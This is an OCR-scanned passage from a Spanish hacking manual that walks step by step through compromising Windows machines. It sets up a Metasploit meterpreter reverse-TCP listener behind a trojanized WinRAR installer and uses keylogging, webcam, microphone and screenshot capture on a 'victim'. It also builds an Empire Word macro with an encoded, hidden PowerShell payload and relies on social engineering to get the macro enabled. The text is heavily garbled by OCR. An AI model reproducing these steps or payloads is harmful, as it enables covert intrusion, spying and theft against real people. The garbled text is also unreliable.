Name Current Setting Required Description 


Payload options (windows/meterpreter/reverse tcp): 


Name Current Setting Required Description 


EXITFUNC process Exit technique 
LHGST yes The listen address 
LPORT 4444 yes The listen port 


Exploit target: 





Para darle valor a estas variables, basta con utilizar la palabra reservada set, 
luego del nombre de la variable y su valor. Recuerda que el LPORT tiene que ser 
igual al que pusiste en el payload, sin embargo, el LHOST siempre es la IP local, ya 
que el servicio se corre localmente, aunque la conexión llegue a la IP pública. 


Luego de darle valor a las variables, podemos escribir show options de 
nuevo para confirmar que este adecuadamente configurado. 


msf expioit( ) > set LHOST 192.168.1.67 
LHOST => 192 

msf expioití } > set LPORT 443 

LPORT => 443 

imsf exploit { ) > show options 

Module options (expioit/multi/handier}: 


Name Current Setting Required Description 


Payload options (windows/meterpreter/reverse tcp): 


Name Current Setting Required Description 


EXITFUNC process Exit technique 
LHOST 192.168.1.67 yes The listen address 
LPORT 443 yes The listen port 
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Y finalmente, escribimos la palabra reservada exploit para ejecutar el 
comando, en este punto estamos escuchando, esperando recibir las conexiones una 
vez que se ejecute el código malicioso en la máquina de la víctima. 


msf exploit( ) > exploit 





} Started reverse TCP handler on 192.168.1.67:443 


Cuando la victima abra el archivo malicioso, por ejemplo, en este caso el 
WinRAR en un Windows, la terminal te mostrará que estan llegando paquetes, la 
prueba de que tienes control del sistema es cuando aparece la palabra meterpreter 
>, que significa que estás dentro del sistema y tienes control de este. 


msf exploit( ) exploit 


Sta rted reverse TCP handler on .1.67:443 
S ing stage (179779 bytes) to 192.168.1.141 
} Meterpreter session 1 opened (192.168.1.67:443 -> 192.168.1.141:49813) at 2018-08-02 23:31:21 -0500 





meterpreter > | 


Mientras que en la maquina de la victima aparece como un programa 
cualquiera. 


SB WinRAR 5.50 


softonic menni 


enioy software! 











Esta es una versión de prueba del compresor WinRAR. 
Cualquiera puede usarla durante un período de prueba de 40 días 


POR FAVOR LEA DETENIDAMENTE EL ACUERDO DE 


LICENCIA SIGUIENTE ANTES DE CONTINUAR CON LA 
INSTALACION. 


ACUERDO DE LICENCIA DE USUARIO FINAL 





El siguiente acuerdo de licencia es una traducción del acuerdo original, 
escrito en inglés en incluido en la versión inglesa de WinRAR. En caso de 








Si acepta el CONTRATO DE LICENCIA DE USUARIO FINAL (EULA), por favor puise instalar]. Si no 
está de acuerdo, por favor pube {Cancia}. 








a ea, 
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Ahora, una vez que tienes un meterpreter, estas en lo que se llama “sesión”, 
por ejemplo, en el caso anterior, es la sesión 1, pero si infectó a otra máquina, se 
abrirá una sesión 2, solo puedo interactuar con una sesión a la vez, sin embargo, 
puedo tener más de una sesión activa. 


Para ver los comandos básicos que puedes hacer en una máquina 
comprometida, puedes escribir la palabra reservada help, y te saldrá una lista de 
comandos que puedes ejecutar. 


Command Description 


enumdesktops List ali accessible desktops and window stations 

getdesktop Get the current meterpreter desktop 

idietime Returns the number of seconds the remote user has been idle 
keyscan dump Dump the keystroke buffer 

keyscan start Start capturing keystrokes 

keyscan stop Stop capturing keystrokes 

screenshot Grab a screenshot of the interactive desktop 

setdesktop Change the meterpreters current desktop 

uictl Controi some of the user interface components 


Record audio from the defauit microphone for X seconds 
Start a video chat 
List webcams 

webcam Take a snapshot from the specified webcam 

webcam stream Play a video stream from the specified webcam 





Con estos comandos puedes hacer cosas como obtener información del 
sistema, con sysinfo, del usuario, con getuid, capturas de pantalla, con screenshot, 
capturas de teclado(keylogger) con keyscan_start, entre otras cosas que mencionaré 
a continuación. 


4.4.1.4.1 Información del sistema 


Algo de lo primero que quieres hacer siempre que obtengas acceso a un 
sistema por medio de un RAT, es ver la información del sistema, es decir, que sistema 
operativo es, que IP tiene, etc. 


Para esto, puedes utilizar el comando sysinfo, que te dirá el sistema operativo 
y versión de este del sistema. 
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meterpreter > sysinfo 

Computer : WIN-KAGNAUTILSB 

OS : Windows 7 {Build 7600). 
Architecture : x64 


System Language : es ES 
Domain : WORKGROUP 
Logged On Users : 2 
Meterpreter : x86/windows 





4.4.1.4.2 Cámara Web y Micrófono 


Para activar la cámara web, basta con ejecutar el comando webcam_snap, 
y la cámara se activará (la limitante es que si la cámara está bloqueada o tapada), 
muchos ordenadores tienen LEDs que avisan cuando se activa. 





Por otro lado, el micrófono, activado con el comando record_mic -d 
<segundos a grabar> <ruta de grabado>, este comando es más útil para actividades 
de espionaje o auditoría, por ejemplo, si quisieras grabar 30 segundos el micrófono, 
escribirías record_mic -d 30 


root /azdMHLPA .wav 





4.4.1.4.3 Captura de pantalla 


Otra cosa muy común al hacer auditorías es ver que esta haciendo o viendo 
la víctima, con el comando screenshot puedes obtener una captura de pantalla del 
sistema sin que la víctima se dé cuenta. 


meterpreter > sc reenshot 





Screenshot saved to: /root/Desktop/glGz0kon.jpeg 
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4.4.1.4.4 Keylogger 


Antes de ver formas mas sofisticadas de robar contrasefias, usaremos las 
más simples, que es grabar todo lo que la víctima teclea en el ordenadore con un 
keylogger, que se inicia con el comando keyscan_start, puedes ver lo que grabo con 
el comando keyscan_dump, y se detiene con el comando keyscan_stop. 


meterpreter > keyscan start 

Starting the keystroke sniffer ... 

meterpreter > keyscan dump 

Dumping captured keystrokes... 
<MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYU! 
SCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULA| 
S><MAYUSCULAS><MAYUSCUL. MAYUSCULAS><MAYUSCULAS><MAYUSCULAS>Prueba, si esto fuera infor 
macion sensible, se hubiera podido robar. 


meterpreter > keyscan stop 
Stopping the keystroke sniffer... 
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4.4.1.4.5 Información del usuario 


Diferentes usuarios en un sistema tienen diferentes niveles de privilegios, asi 
que es elemental saber qué nivel de privilegios tienes en el sistema, puedes obtenerlo 
con el comando getuid. 


meterpreter > getui 





Server username: WIN-KAG6NAUTILSB\WhiteSuit Hacking 


4.4.1.4.6 Ver procesos 


También podrías ver todo lo que está haciendo el objetivo por medio de los 
procesos, los cuales podrás modificar, cerrar o utilizar para migrar, puedes ver los 
procesos con el comando ps. 


Como puedes ver, nos muestra los permisos, rutas e identificaciones de los 
procesos. 





4.4.1.4.7 Shell 


Hay algunos comandos que no puedes realizar en meterpreter, por que corre 
en base PowerShell, pero es muy sencillo pasarte a una shell con el comando shell. 


Una vez en una shell, puedes terminar la shell usando control c y volver a 
meterpreter, o ponerla en segundo plano y volver al meterpreter usando control z. 


meterpreter > shell 
Process 196 created. 


Channel 1 created. 
Microsoft Windows [Versi@n 6.1.7600] 
Copyright (c) 2009 Microsoft Corporation. Reservados todos tos derechos. 


C:\Users\WhiteSuit Hacking\Downioads>*C 
Terminate channel 1? [y/N] n 


C:\Users\WhiteSuit Hacking\Downioads>*Z 
Background channel 1? [y/N] 
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4.4.1.4.8 Manejo de archivos 


Tanto en shell como en meterpreter, aunque con más control y funcionalidad 
en el segundo, nos podemos mover en los archivos del sistema y modificar, descargar, 


borrar o subir archivos, 


puedes usar comandos comunes de Linux para moverte 


(dentro de meterpreter), o del sistema operativo donde estés si estas en una shell. 


meterpreter > pwd 


C:\Users\WhiteSuit Hacking\Downtoads 


meterpreter > is 


Listing: C:\Users\WhiteSuit Hacki 


Mode 


100660/ rw- rw- rw- 
100777 / rwxrwxrwx 





ADownloads 


Size 
282 
2120192 


Name 


desktop.ini 
winrar.exe 


2618-64-23 10 
2618-68-02 23 


:02:30 -0500 
:30:39 -0500 


Estos son algunos de los comandos que puedes utilizar para esto dentro de 


meterpreter. 


checksum 
cp 

dir 
download 
edit 
getlwd 


getwd 
lcd 
lis 
1pwd 


search 


show mount 


upload 





Read the contents of a file to the screen 
Change directory 

Retrieve the checksum of a file 
Copy source to destination 

List files (alias for is) 
Download a file or directory 
Edit a file 

Print local working directory 
Print working directory 

Change local working directory 
List local files 

Print local working directory 
List fites 

Make directory 

Move source to destination 
Print working directory 

Delete the specified file 
Remove directory 

Search for files 

List ali mount points/logical drives 
Upload a file or directory 


4.4.1.4.9 Información de interfaces de red 


Siempre que estés en un sistema externo, una de las primeras cosas es 
saber cómo se está conectando el sistema a la red y que IP tiene. Puedes sacar esta 
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información bastante fácil pidiendo las interfaces con el comando ifconfig. Recuerda 
que luego este sistema te puede servir para atacar a otros sistemas dentro de la misma 
red, así que conocer esta información es muy importante. 


meterpreter > ifconfig 


z :0c:29:be:d4:77 
: 1500 


: 192.168.1.141 
IPv4 Netmask : 
IPv6 Address : fe80::fcfc:1498:6662:5b26 
IPv6 Netmask : ffff:ffff:ffff:ffff:: 





4.4.2 Archivos Office infectados (EMPIRE) 


Un ejecutable infectado no es la única forma de comprometer un dispositivo 
Windows, hay diversas formas de hacer esto, lo único que se necesita es una forma 
de ejecutar código o comandos en el sistema. Es aquí donde entra Empire, esta es 
una herramienta que originalmente fue diseñada para post-explotación, pero también 
tiene algunas funcionalidades interesantes que se pueden utilizar para comprometer 
un sistema Windows al abrir un documento Office como Word, PowerPoint y Excel, 
notaras que esta herramienta tiene muchas similitudes con Metasploit en cuanto a 
estructura, sin embargo, las palabras reservadas son diferentes así que toma esto 
en cuenta al utilizarla, además, está escrita en Python, mientras que Metasploit 
por el contrario en Ruby, lo que principalmente notaras es que Empire es mucho 
más sensible al uso de mayúsculas que Metasploit, en donde puedes utilizar o no 
utilizarlas. 


Necesitas acceso a Office para crear este archivo malicioso. 





4.4.2.1 INSTALACIÓN EMPIRE 


Antes de utilizar Empire, deberás instalarlo, para hacer esto, ve en la carpeta 
de Empire usando el comando cd /opt/Explotación/Empire, y luego a la carpeta 
setup escribiendo ed setup, y ejecuta el script de instalación con el comando ./ 
install.sh. 
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:/# cd /opt/Expiotacion/Empire/ 
y a # ls 


changelog Dockerfile 





Simplemente presiona enter en todas las preguntas, y al terminar el proceso 
de instalación Empire debería estar abierto. 


modules currently loaded 
8 Listeners currently active 


® agents currently active 





(Empire) > | 


Para abrir de nuevo Empire, deberás irte a la carpeta inicial de Empire, / 
opt/Explotacion/Empire y ejecutar el comando para iniciar Empire escribiendo ./ 
empire en la terminal. 


changelog de _Dockerfile 





4.4.2.2 ESTRUCTURA DE EMPIRE 


La estructura de Empire está dividida de manera muy similar a Metasploit, 
pero encontrarás que es un poco menos predecible la estructura de esta, que está 
dividida en tres funciones principales: 
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1. Listeners 


Al igual que Metasploit, se necesita un manejador para escuchar las 
conexiones del código malicioso, o RAT, que se ejecuta en la máquina 
del objetivo, sin embargo, aquí no se configura un escuchador, si no un 
modelo de escuchador, y puedes tener varios modelos para escuchar 
diferentes puertos y tipos de conexiones al mismo tiempo, esta carpeta es 
donde están estos modelos y la información para configurarlos. 


2. Modules 


Los módulos en este caso son scripts de post-explotación que se utilizan 
una vez que ya tengas acceso a un sistema. 


3. Stagers 


Finalmente, los stagers en este caso actúan como el módulo de payload de 
Metasploit, esta parte de Empire es la que permite crear código malicioso 
que te dará acceso remoto al objetivo. 


También existe un concepto llamado agents, y esto se refiere a las máquinas 
a las que tienes acceso remotamente, es el equivalente en Metasploit a una sesión. 


4.4.2.3 PALABRAS RESERVADAS EMPIRE 


Al igual que Metasploit, Empire tiene varias palabras reservadas para 
diferentes usos, te explicare las principales. 


Help 

Este comando, que es el puedes utilizar en cualquier momento, te dará una 
lista de comandos que puedes ejecutar en ese momento. 
Agents 

Este comando te mostrará los agentes, los cuales representan a los sistemas 
comprometidos y accesibles por la herramienta en ese momento. 
Interact 


Este comando te permitirá interactuar, en otras palabras, controlar, a algún 
agente, para esto basta con escribir interact <ID de agente> 
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Listeners 


Este comando te mostrará los escuchadores que tengas corriendo en un dado 
momento, recuerda que, para poder realizar cualquier ataque, necesitas tener un 
escuchador levantado, si lo tienes iniciado al escribir listeners te mostrará algo como 
lo siguiente. 


(Empire) > Listeners 


Delay/Jitter KillDate 


.168.1.67:80 





Info 


Escribir info en un módulo o comando te mostrará las opciones que tienes 
para configurar, es decir, las variables del ataque, algo similar a lo siguiente. 





Set 


Al igual que en Metasploit, la palabra set se utiliza para asignar valor a 
una variable, hay que recordar que aquí son muy importantes las mayúsculas, por 
ejemplo, para cambiar la variable Host, escribiría set Host y el valor, que en este 
caso es hitp://192.168.1.67:80 
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) > set Host http: //192.168.1.67:30ff 


Al ejecutar el comando y confirmar con el comando info, podrás ver el 
cambio en la variable. 


http://192.168.1.67/:80 Hostname/IP for staging. 





Searchmodule 


Para buscar algún módulo, es decir, comando que puedes utilizar en post- 
explotación, basta con escribir el comando usemodule <búsqueda>, en el que pones 
el script que estés buscando, por ejemplo, si busco un script que muestra un mensaje, 
escribiría searchmodule message, recibiendo la siguiente respuesta. 


(Empire) > searchmodule message 


Change the login message for the user. 


Displays a specified message to the user. 


Change the login message for the user. 





Usemodule 


Para utilizar alguno de los módulos, al saber su ruta, deberás utilizar el 
comando usemodule seguido de la ruta de este, por ejemplo, si quisiéramos utilizar 
el comando en powershell/trollsploit/message, tendríamos que escribir usemodule 
powershell/trollsploit/message 


(Empire) > usemodule powershell/trollsploit/message 





(Empire: pew £ 


Usestager 


Al querer usar un stager, es probablemente el segundo paso que usaremos en 
un ataque o en la mayoría de ellos (lo primero sería lanzar un listener), escribirias 
usestager <ruta>, por ejemplo, usestager /windows/macro 
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Empire) > usestager windows/macro 





(Empire: stager/wi acro) > 


List 


Este comando puede ser utilizado para enlistar listeners activos o agentes 
activos escribiendo list agents o list listeners. 


(Empire) > tist listeners 


Name Module Host 


http http://192.168.1.67:80 


(Empire) > List agents 





Main 


La palabra clave main se utiliza en esta herramienta para volver al menu 
principal. 


(Empire) > help 


Jump to the Agents menu. 

Add/display credentials to/from the database. 

Exit Empire 

Displays the help menu. 

Interact with a particular agent. 

Lists active agents or listeners. 

Interact with active Listeners. 

Loads Empire modules from a non-standard folder. 

Load a plugin file to extend Empire. 

List all available and active plugins. 

a Preobfuscate PowerShell module source files 

Reload one {or all) Empire modules. 

Reset a global option (e.g. IP whitelists). 
resource Read and execute a List of Empire commands from a file. 
searchmodule Search Empire module names/descriptions. 
set Set a global option (e.g. IP whitelists). 
show Show a global option (e.g. IP whitelists). 
usemodule Use an Empire module. 
usestager Use an Empire stager. 





Execute 


La palabra clave execute se utiliza en Empire para ejecutar stagers y 
módulos, es el equivalente de exploit o run de Metasploit. 
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4.4.2.4 CREAR EL ARCHIVO INFECTADO DE MICROSOFT OFFICE 


Ahora vamos a crear un documento Word con código malicioso, este código 
hará que tengamos acceso remoto al powershell de Windows, lo cual compromete el 
sistema en un alto nivel 


Para esto, con Empire abierto, deberemos seguir los siguientes pasos. 


4.4.2.4.1 Crear un listener 


Primero que nada, en Empire debemos crear un listener, que vaa ser utilizado 
para recibir las conexiones, asi como para configurar el código malicioso para que 
sepa a dónde y por qué puerto mandar los paquetes. 


Para esto, primero utilizas el comando listeners, que te mostrará los listeners 
activos (si es que hay), y te meterá a la carpeta de listeners, aquí puedes utilizar el 
comando help para ver el resto de los comandos que puedes utilizar. 


(Empire) > listeners 


(Empire: ys) > help 
Listener Commands 


Jump to the agents menu. 
Go back to the main menu. 
Display/return credentials from the database. 
Exit Empire. 
Displays the help menu. 
Display information for the given active listener. 
Kill one or all active listeners. 
Generate an initial launcher for a listener. 
List all active Listeners (or agents). 
Listeners Jump to the listeners menu. 
main Go back te the main menu. 
resource Read and execute a list of Empire commands from a file. 
uselistener Use an Empire Listener module. 
usestager Use an Empire stager. 





Luego utiliza el comando uselistener http para utilizar el modelo de listener 
http, estos modelos (hay varios) están en la carpeta listeners dentro de la carpeta 
donde instalaste Empire. 


(Empire: ii ) > uselistener http 





(Empire: ) > 


Escribe info para que veas las configuraciones posibles que le puedes hacer 
al listener, confirmaras que la variable Host esté correcta con tu IP y tu puerto, 
normalmente Empire la autoconfigura, así que pocas veces tendrás que modificar 
esto. 
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Ahora para iniciar el listener, simplemente escribe execute y presiona enter, 
a este punto deberia de confirmarte que el listener fue iniciado exitosamente. 


(Empire: ) > execute 
ing Flask app "http" (lazy loading) 
* Environment: production 





Escribe main y presiona enter, y en el menú principal ahora aparecerá el 
listener activo. 


nodules currently Loaded 
i Listeners currently active 


% agents currently active 


(Empire) > maini 
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4.4.2.4.2 Crear el cédigo malicioso 


Ahora vamos a crear el código malicioso, para esto, ejecutamos el comando 
usestager windows/macro, esto lo que hace es llevarte al stager que es el que puede 
crear código malicioso en forma de macro para inyectar en archivos que puedan 
ejecutarlo, tal como los documentos de office. 


(Empire) > usestager windows/macro 


(Empire: | 





Al ejecutar el comando info, te mostrará las variables y los valores asignados 
a estos. 


(Empire: 


Name: Macro 


d to use. 


ProxyCreds 


UserAgent False 
Proxy F 


StagerRetries False 9 r the stager to retry 
ng. 





Vamos a cambiar dos variables, la primera, es el Listener, en la cual le 
daremos el nombre del listener que hemos iniciado, que se llama http, con el comando 
set Listener http, y el segundo cambio será la variable OutFile, que cambiaremos 
por la ruta donde guardaremos el código, que será /root/Desktop/virus.txt con el 
comando set OutFile /root/Desktop/virus.txt 





Podemos confirmar los cambios con info. 
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(Empire: 


Macro 


e to out 
d on the 


-Obfuscation c 
Only use switch is True. 
For powerst 


passwor« 
] or other). 
defau Jser- > for th 
uest (default, n or other). 
default to use for 





Podemos observar que ahora en nuestro escritorio hay un archivo llamado virus. 
txt con código en Visual BASIC, este es nuestro código malicioso, vamos a necesitar 
integrarlo a un documento Word para que nos sea útil, selecciona el código y cópialo. 


[Sub Auto_Open() 
t 


Auto0pen() 
t 
Sub 


Document_0pen() 
t 
Sub 


Public Function t() As Variant 
Dim OXNK As String 
OXNK = “powershell -noP -sta -w 1 -enc SQBRACGAJABOAFMAVO” 
OXNK = OXNK + “BFAHIAUWE JAESADQBUAEEAQQBMAEUAL gBOAFMAVGBFAFIACWEp* 
OXNK = OXNK + “AEBATGAUAEBAYOBKAEBACQAGACBAZWBLACAAMWADAHSAJABHAF™ 
OXNK = OXNK * AARGASAF SACGBFAEYAXQAUAEEAUwBZAEUADQB i AGWANQAUAECA" 
OXNK = OXNK + "RQBUAFQAeQBWAGUAKAANAFMAeOBZAHQAZQBTACSATQBNAGSAYQ* 
OXNK = OXNK “BNAGUADQB 1 AG4AGAAUAEEAUQBOAGSADQBhAHQAaQBYAG4ALGBY” 
OXNK ” AHQAaQBSAHMA JwADAC4AI gBHAGUAVABGAEKAZQBGAEWARAAIAC™ 
OXNK “gAJwB j AGEAYwBoAGUAZABHAHIAbwS LAHAAUABVAGwAaQB j AHKA” 
OXNK ”UWBLAHOACABDAGSAZWBZACCALAANAESAJWASACCADWBUAFAADO” 
OXNK “BiAGwAaQBj ACwAUWBOAGEAGAB pAGMA JwApADSASQBRACIAJABH” 
OXNK “AFAARQApAHSAJABHAFAAQWASACGARWBQAEYAL gBHAGUAGABWAE* 
OXNK "EADAB LAGUAKAAKAG4S AdQBMAEWAKQA7AEKARQAOACQARWEQAEMA* 
OXNK “WWANAFMAY WB yAGKACABBAETAJ wArACCADABYAGMASWBMAGSAZW” 
OXNK "BNAGKADIBNACCAXOADAHS AJABHAFAAQWBDACCAUWE] AHIA20Bw" 
OXNK “AHQAQGANACSAIWBSAGSAY HBr AEWADWBNAGCASQBUAGCAIJWEdAF” 
OXNK ” SAIWBFAG4AYOQB LAGWAZQBTAGMACQBPAHAAGABCACCAKWANAGWA® 
OXNK “bwB J AGSATABVAGCAZWBDAGIAZWANAFSAPQAWADSAJABHAFAAQU” 
OXNK * BbDACCAUWB  ANIA2QBwWAHOAOGANACSAJwWBSAGSAYWBrAEWAbwBn" 
NK İAGWAZQBTAGĦACI x 


oon NN 


tht hee ht hee tee bt 
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4.4.2.4.3 Infectar el archivo office con el código malicioso 


Ahora abre un documento de Office Word, y activa las opciones de 
desarrollador, para esto, deberás abrir la opción donde dice files. 


Insert Draw Design 


Calibri (Body) + [11 


Y Format Painter Sai = 





Clipboard a Fort 


Seguido de eso, busca el botón de “opciones”, que debería estar hasta abajo 
en la sección a la izquierda. 


Save as Adobe 
PDF 


Print 
Share 
Export 


Close 


Account 


Feedback 


Options 





Ahora, vete a las opciones de “customize ribbon”, y asegúrate que la opción 
“developer” o desarrollador, este activada. 
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Word Options 





Saa : = Customize the Ribbon and keyboard shortcuts. 


Display 
Cheese commands fre Custernize the Ribbon: 
Proofing == = 


: Popular Commands a : Main Tabs 
Save 
ree | Acceptevision lación 
i Add Table © Outlining 
Ease of Access i Align Left i © M Background Removal 
f Bullets a Home 
Center | 2 
E Ch 
Change List Level E —— 
3 Copy l 5 
B sl y] E Paragraph 
wick Access Toolbar |: Cut | 5 ES 
i Define New Number Format... i 
Add-ins E Delete 


Advanced 





Draw Tabie 
ws Vertical Text Box 
3 Email 
Find A 
Fit to Window Width Remove 8 M Layout 
Font i i a M References 
Font Color = Mailings 
Font Settings B Review 
Font Size 
f Factnote a M View 
Format Painter 
Grow Font Add-ins 
insert Comment a Help 


; Insert Page Section Breaks = PAACROBAT 
5 Insert Picture E me 


Customizations: [ree y Jo 
Import/Export ¥ KD 


i Trust Center 




















Ahora notaras que en la barra de opciones en la parte superior tienes una 
opción que se llama desarrollador o developer, haz clic en esta, y en el botón que 
dice “visual basic”. 


Mailings Review View Help ACROBA 


XML Mapping E Restrict Document 
Pane A zs- Editing : Template 
Code Add-ins Controls Mapping z Protect Templates 





Ahora haz clic en el documento a la izquierda. 
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: File Edit View Insert 


ma- 


en Empire. 


"ACQASQArADEAKQOALADIANQA2ADSAJABIADOAKAAKAEGAKWAKAF" 
"MANWAKAE KAXOQADACUAMGA IADYAOwA KA FMAWWAKAE KAXOASACOA” 
"UwBbACQASASdADOAGABTAFSAGABIAFOGALAAKA FMAWWAKAEKAXO"™ 
"ATACQAKWAtAE IAcABVAF IAJABTAFSAKAAKA FMANWAKAE KAXOQAr” 
"ACOQAUWBbACOASABGAC RAJOA VADUANGBGAHOATOA7FACOACWBIAH® 
"TAPQANAGGAdGABOAHAAOGAVACSAMOASADIALGAXADYAOAAUADEA™ 
"LgA2ZADCAOGA¢ADAAJWA7ACQAGAASACCALWBSAGSAZwBpAG4ALw™ 
"BwAH TAbwBjAGUACWBZAC 4ACcABOAHAAJwA7TACQAdwB IACSASABL™ 
"AGEARABI1AHTAUWAUAEEARABKACGAI gGBDAGSADWBLAGKAZOAIAC™ 
"wAI gBZAGUAcwBZAGkAbwBuADOAeQBOAGSANOBOAHQAOGByAE kA” 
"TOBPAE gAdwArAF sAQwBoAEQAVOBZADEASGB4AHUASgBGAHMA PO” 
"BIRCKAQWAKAE QAYOROAREAPOQAKAF CAQwAUAE QAbwS3AE4ATABY" 
"AEEARABEAGEAVABBACGAJABZAGUACGArACOAVAADADSAJABGAF" 
"YAPOAKAGQAQOBUAEEARWAWAC 4ALGAZAFOAOWAKACQAYOBUAGEA® 
" POAKAE QA YOBUAGEANWADACSALGAKAGGAYOQBOAEEALGBMAGUADg”™ 
"BHAFOA2ABAADSALOBRAGSASOBOAFSAQWBIACEAUGBOAFOAXOA 0” 
"ACYATAAKAFIATAAKACOAYOBOREEAIABOACOASOBNACSAJABLAC” 
"XAXODSAEKAROBYAD==" 

Const HIDDEN WINDOR = O 

strComputer = *.* 

Set objWMiService = GetObject ("winmgmts:\\" & strComputer & *\root\cimv2") 
Set objStartup = objWMiService.Get ("Win32 ProcessStartup”) 

Set objConfig = objStartup.Spawninstance_ 

objConfig.ShowWindow = HIDDEN WINDOW 

Set objProcess = GetObject ("winmamts:\\* £ strComputer & "lrooticimv2:Win32 Process”) 
objProcess.Create OXNK, Null, objConfig, intProcessID 


+ doo Re 





Una vez hecho esto, haz clic en el icono de grabado en la parte a la izquierda 
superior, y grábalo como un documento .doc. 
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File Edit 


EE Save As 
ES >» Æ i>» ThisPC > Desktop > Libro 


Organize + New folder 


E This PC z Date modified Type 


3% 0 a No items match your search. 
E] Documents 
4 Downloads 


ss Data (Ds) 
$ CD Drive (E) WC 


PR ee 











Web Page, Filtered (*.htm:".htmi) 
Rich Text Format (*.1tf) 

Pizin Text ot} 

Word XML Document (xm) 





¡Listo! Ya tienes, por un lado, el escuchador, y por otro, el archivo Word con 
código malicioso, ahora si tu víctima abre el archivo Word y acepta la barra superior 
(lo cual con ingeniería social es fácil de conseguir), tendrás acceso remoto de su 
sistema. 





SECURITY WARNING Macros have been disabled. | Enable Content 
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4.4.2.5 CONTROLAR AL SISTEMA REMOTAMENTE 


Una vez que esto sucede y tienes acceso a tu victima, tendras acceso via una 
powershell, esta herramienta es atin mas poderosa que una consola de comandos, ya 
que puedes ejecutar comandos avanzados por este medio. 


4.4.2.5.1 Obteniendo acceso al sistema comprometido 


Ahora en tu consola de Empire deberían aparecerte agentes, es decir, sistemas 
comprometidos. 


2 modules currently loaded 


i listeners currently active 


9 agents currently active 





Para interactuar con estos agentes, basta con escribir agents para que te de 
una lista e información de los agentes, e interact <nombre>, siendo el ID el nombre 
del agente para obtener control del sistema por medio de powershell. 


(Empire) > agents 


Lang Internal IP Machine Name Username Process 


EDFBRCXT ps 192.168.159.1 feMSI MSI\Pablo Gutierrez [ shell/24004 
4ABTWGEF ps 192.168.159.1 feMST MSI\Pablo Gutierrez powershell/27592 


(Empire: agents) > interact EDFBRCXT 
(Empire: ) > 





Una vez que tu terminal muestre el nombre del agente, significa que tienes 
un acceso por medio de powershell, esto significa que, aunque tienes un alto grado 
de control del sistema, tiene un pequeño retraso en tiempo de respuesta, y deberás 
usar módulos de post explotación relevantes a powershell para hacer cosas más 
avanzadas. 
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4.4.2.5.2 Obteniendo información del sistema 


Con el comando sysinfo la consola te dará información del sistema como 
sistema operativo, IP interna, usuario, y nombre del proceso. 


: ) > sysinfo 
(Empire: ) > sysinfo: @ihttp://192. 
::e506:6c8d:abd1:a2d9 192.168.1.70 fe80::f 
Microsoft Windows 10 Home|Falsejpowersh 


Listener: háttp://192.168.1.67:80 
Internal IP: 192.168.159.1 fe8@: :996: $ 
92.168.1.83 fe86::6c2d: 192.14 


MSTI\Pablo Gutierrez 
MST 
Microsoft Windows 10 Home 
6 
Process Name: powersheil 
Process ID: 24004 
Language: powershell 
Language Version: 5 





4.4.2.5.3 Archivos 


Debido a que tenemos una conexión powershell, podemos hacer cosas como 
navegar por los directorios del sistema comprometido usando sintaxis Linux, ver 
archivos, y descargarlos. 


(Empire: ) > pwd 
(Empire: Js 


C: \WINDOWS\system32 


(Empire: EE 


)> 


Name 
10/23/2017 2:20:26 AM $GetCurrent 
2/28/2018 10:05:41 PM $Recycie.Bin 
4/25/2018 6:47:09 PM 82ace7d6-0197 
1/7/2018 3:13:32 AM 
8/6/2018 10:30:35 AM Config.Msi 
10/22/2017 9:23:09 PM Documents and Settings 
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Si encontramos un archivo que queremos descargar, por ejemplo, este 
archivo llamado ARCHIVO SECRETO.txt 





4/24/2018 11:24:16 AM 19 ARCHIVO SECRETO. txt 


Basta con ejecutar el comando download tras el nombre del archivo, para 
descargarlo. 


(Empire: ) > download "ARCHIVO SECRETO.txt" 
(Empire: 


(Empire: 
[*] File download of C: ARCHIVO SECRETO.txt compieted 


Que los archivos descargados se guardarán en la carpeta downloads dentro de la carpeta 
Empire. 








[8] opt Explotacion Empire downloads “EDFBROXT | 








O Recent 


Home 





sl iiss 


También, si requieres hacer algún comando en particular, puedes utilizar los 
módulos de Empire que están en la carpeta modules. 


[IS] opt Explotacion Empire lb modules - powersheil 





OCC 


£ Home | code_ collection credentials exfiltration exploitation lateral managemen 


— execution movement t 
æ Desktop 


Dou E E E 


| persistence ive recon situational. _trollsploit 
awareness 


(O Downloads 





Para utilizar alguno de estos, deberás utilizar el comando usemodule 
y searchmodule (si no sabes el nombre/dirección del módulo), primero usa 
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searchmodule para saber la dirección del módulo, vamos a buscar uno que imprima 
un mensaje en la maquina del objetivo, para esto escribe searchmodule message. 


) > searchmoduie message 


Change the login message for the user. 





Displays a specified message to the user. 


Y para ejecutarlo, basta con escribir usemodule trollsploit/message, nota 
como solo escribi lo que sigue de powershell, ya que lo primero esta implicito. 


(Empire: ) > usemodule powershell/trolisploit/message 


(Empire: ) > usemodule trollsploit/message 
(Empire: powersheil/tro lo: ssage) > 





Cualquier módulo que ejecutes deberás configurarlo con la opción info, 
modificar las variables que necesites con set y ejecutarlo posteriormente con execute. 


Options: 


Name Required Description 


MsgText True lost contact with the Message text to display. 
Domain Controller. 
IconType True Critical Critical, Question, Exclamation, or 
Information 
Agent True EDFBRCXT Agent te run module on. 
Title True ERROR - 0xA801B720 Title of the message box to display. 


(Empire: powersheli/trollsploit/message) > set MsgText "WhiteSuit Hacking te ha hackeado.” 





En este módulo, se mostrará un mensaje de error en el ordenador del 
infectado, sin embargo, hay otros módulos desde para robar contraseñas, hasta para 
atacar a otras máquinas desde la maquina comprometida. 


“Opsec safe” se refiere a que este módulo es muy notorio, sin embargo, existen otros 
más sigilosos. 
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El ERROR - OxA8018720 


(Empire: powershell /tre pLoit/message) > execute 
5 A = = = y 3 ‘WhiteSut Hacking te ha hackeado. 


(Empire: pow je) > 
Job started: 645LBZ 





Adicionalmente, hay muchas más cosas que puedes hacer de las que 
mencione, pero puedes darte una idea escribiendo el comando help y dándole un 
vistazo a las carpetas en módulos dentro de Empire. 


) > help 


Jump to the agents menu. 

Go back a menu. 

Runs BypassUAC, spawning a gh-integrity agent for a listener. Ex. spawn <Listener> 
Clear out agent tasking. 

Display/return credentials from the database. 

Task an agent to download a file. 

Return downloads or kill a download job 

Task agent to exit. 

Displays the help menu or syntax for particular commands. 

Display information about this agent 

Inject listener shellcode into a remote process. Ex. injectshellcode <meter iistener> <pid> 
Return jobs or kill a running job. 

Task an agent to kill a particular process name or ID. 

Get or set an agent's kil (01/ 

Lists all active agen 

Jump to the listeners 

Task an agent to chan 

Go back to the main menu. 

Runs Invoke-Mi f 

